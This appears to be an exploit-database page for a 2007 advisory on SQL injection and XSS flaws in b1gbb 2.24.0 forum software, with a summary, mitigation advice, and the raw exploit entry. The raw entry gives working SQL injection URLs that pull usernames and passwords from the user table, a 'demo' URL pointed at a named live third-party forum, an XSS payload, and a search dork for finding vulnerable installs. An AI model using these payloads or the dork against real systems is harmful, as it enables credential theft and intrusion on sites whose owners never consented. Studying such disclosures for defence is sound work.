header-logo
Suggest Exploit
vendor:
b1gbb
by:
GoLd_M = [Mahmood_ali] & t0pP8uZz
5.5
CVSS
MEDIUM
SQL Injection and Cross-Site Scripting (XSS)
89 (SQL Injection) and 79 (XSS)
CWE
Product Name: b1gbb
Affected Version From: 2.24.0
Affected Version To: 2.24.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

b1gbb 2.24.0 (SQL/XSS) Remote Vulnerabilities

There are remote vulnerabilities in b1gbb 2.24.0 that allow for SQL injection and XSS attacks. The SQL injection can be exploited through the 'showthread.php' and 'showboard.php' pages, allowing an attacker to retrieve sensitive information from the 'cebb_user' table. The XSS vulnerability can be exploited through the 'visitenkarte.php' page, allowing an attacker to execute arbitrary scripts in the context of the user's browser.

Mitigation:

To mitigate the SQL injection vulnerability, it is recommended to properly sanitize user input and use prepared statements or parameterized queries. To mitigate the XSS vulnerability, it is recommended to properly encode user input and implement input validation and output encoding.
Source

Exploit-DB raw data:

# b1gbb 2.24.0 (SQL/XSS) Remote Vulnerabilities

# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip

# Exploits SQL :
     
//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
     OR
     
/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
     Demo
     
http://www.gkovacs.de/forum/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*

# Exploit XSS :
     /visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

# Dork:
       "powered by b1gBB (b1g Bulletion Board)"


# Discovered by:
       GoLd_M = [Mahmood_ali] & t0pP8uZz

# Homepage:
     http://www.Tryag.Com/cc

# Sp.Thanx To :
       Tryag-Team & G0t-Root.Net

# milw0rm.com [2007-06-28]